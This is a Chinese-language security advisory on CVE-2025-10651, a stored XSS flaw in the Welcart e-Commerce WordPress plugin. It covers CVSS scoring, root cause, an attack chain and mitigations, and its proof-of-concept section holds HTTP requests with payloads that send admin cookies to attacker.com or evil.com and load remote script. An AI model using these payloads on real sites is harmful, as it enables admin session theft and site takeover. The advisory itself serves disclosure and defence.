CVE-2025-10651：Welcart e-Commerce插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-10651

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

5.5 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Welcart e-Commerce（WordPress插件 usc-e-shop）

漏洞概述

CVE-2025-10651是WordPress的Welcart e-Commerce电子商务插件中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由Wordfence安全团队的安全研究员发现，并于2025年10月22日公开披露。Welcart e-Commerce是日本广泛使用的WordPress电子商务插件，提供在线商店、商品管理、订单处理和邮件通知等功能。

该漏洞存在于插件的'order_mail'（订单邮件）设置字段中。攻击者通过在常规设置页面（General Setting page）中注入恶意JavaScript代码，这些代码会被持久化存储在数据库中。当管理员访问电子邮件设置页面（E-mail Setting page）时，恶意脚本将在管理员的浏览器上下文中执行，从而实现权限提升、会话劫持、管理员账户接管或植入后门等攻击行为。

该漏洞的CVSS 3.1评分为5.5分，属于中危级别。虽然利用该漏洞需要攻击者拥有Editor级别及以上权限（PR:H），但一旦利用成功，攻击者可以在管理员上下文中执行任意脚本，危害程度较高。漏洞的根本原因是对'order_mail'字段的输入过滤（sanitization）和输出转义（escaping）处理不足，这是WordPress插件开发中常见的安全缺陷。

技术细节

该存储型XSS漏洞的技术原理如下：

1. **输入过滤不足**：Welcart e-Commerce插件在处理'order_mail'设置字段时，未对用户输入进行充分的内容清理（sanitization）。WordPress中常用的清理函数如sanitize_text_field()、wp_kses()等未被正确使用，导致恶意HTML/JavaScript代码可以原样存入数据库。

2. **输出转义缺失**：在电子邮件设置页面（E-mail Setting page）渲染该字段值时，插件未使用esc_html()、esc_attr()等转义函数对输出内容进行HTML实体编码，使得浏览器将存储的恶意脚本解析为可执行代码。

3. **权限模型利用**：WordPress的Editor角色具有管理文章、页面以及部分插件设置的权限。攻击者利用Editor权限即可访问General Setting页面并修改'order_mail'字段，注入如下形式的载荷：`<script>document.location='https://evil.com/steal?c='+document.cookie</script>`。

4. **触发机制**：当管理员登录后台并访问E-mail Setting页面时，页面会从数据库读取'order_mail'字段的值并直接渲染到HTML中，浏览器解析并执行注入的脚本。由于该操作在管理员权限上下文中执行，攻击者可以窃取管理员cookie、添加新的管理员账户、修改站点设置或上传Web Shell。

5. **CVSS向量分析**：AV:N（网络攻击）、AC:L（低复杂度）、PR:H（需要高权限）、UI:N（无需用户交互）、S:C（范围变更）、C:L（机密性低影响）、I:L（完整性低影响）、A:N（可用性无影响），综合评分为5.5分。

攻击链分析

STEP 1

步骤1：获取Editor权限账户

攻击者通过社工、弱口令爆破、购买凭证或利用其他漏洞获取WordPress站点中Editor级别及以上权限的账户凭据。

STEP 2

步骤2：登录WordPress后台

使用获取的Editor账户登录WordPress管理后台（/wp-login.php），获取有效的认证会话Cookie。

STEP 3

步骤3：注入恶意脚本

访问Welcart e-Commerce插件的常规设置页面（General Setting page），在'order_mail'字段中注入精心构造的JavaScript恶意载荷（如窃取Cookie、创建管理员账户或下载后门的脚本），提交保存。

STEP 4

步骤4：等待管理员触发

恶意载荷被持久化存储在数据库中。攻击者等待管理员登录后台并访问电子邮件设置页面（E-mail Setting page），触发存储的XSS代码执行。

STEP 5

步骤5：权限提升与控制

恶意脚本在管理员浏览器上下文中执行，窃取管理员Cookie、添加新的管理员账户、修改站点配置或上传Web Shell，实现对WordPress站点的完全控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- 
CVE-2025-10651 - Welcart e-Commerce Stored XSS PoC
Vulnerability: Stored XSS via 'order_mail' setting field
Required Role: Editor or above
Target: WordPress admin (when viewing E-mail Setting page)
-->

<!-- Step 1: Authenticate as Editor-level user -->
POST /wp-login.php HTTP/1.1
Host: target-wordpress-site.com
Content-Type: application/x-www-form-urlencoded

log=editor_user&pwd=editor_password&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1

<!-- Step 2: Navigate to General Setting page and inject malicious payload into 'order_mail' field -->
POST /wp-admin/admin.php?page=usces_itemedit&usces_option=mail HTTP/1.1
Host: target-wordpress-site.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_xxx=xxx

<!-- Malicious payload injected into order_mail field -->
<!-- The following script will be stored in database and executed when admin views E-mail Setting page -->
order_mail=<script>fetch('https://attacker.com/steal?cookie='+encodeURIComponent(document.cookie)+'&url='+encodeURIComponent(document.location.href))</script>&usces_option_update=update

<!-- Alternative payload using img onerror for environments blocking script tags -->
order_mail=<img src=x onerror="var s=document.createElement('script');s.src='https://attacker.com/xss.js';document.body.appendChild(s);">

<!-- Step 3: When admin accesses E-mail Setting page, the stored XSS fires -->
GET /wp-admin/admin.php?page=usces_itemedit&usces_option=mail HTTP/1.1
Host: target-wordpress-site.com
Cookie: wordpress_logged_in_admin=xxx

<!-- The malicious script executes in admin's browser context, stealing cookies or performing privileged actions -->

影响范围

Welcart e-Commerce (usc-e-shop) <= 2.11.22

防御指南

临时缓解措施

在无法立即升级插件的情况下，建议采取以下临时缓解措施：1）通过WordPress角色管理插件（如User Role Editor）临时移除Editor角色的Welcart设置页面访问权限；2）在Web服务器层面部署WAF规则，拦截包含<script>、onerror=、javascript:等XSS特征的管理后台POST请求；3）限制只有管理员才能修改Welcart的邮件相关设置；4）定期审计数据库中order_mail等字段的内容，及时发现并清理已注入的恶意代码；5）监控管理员账户的异常登录和操作行为。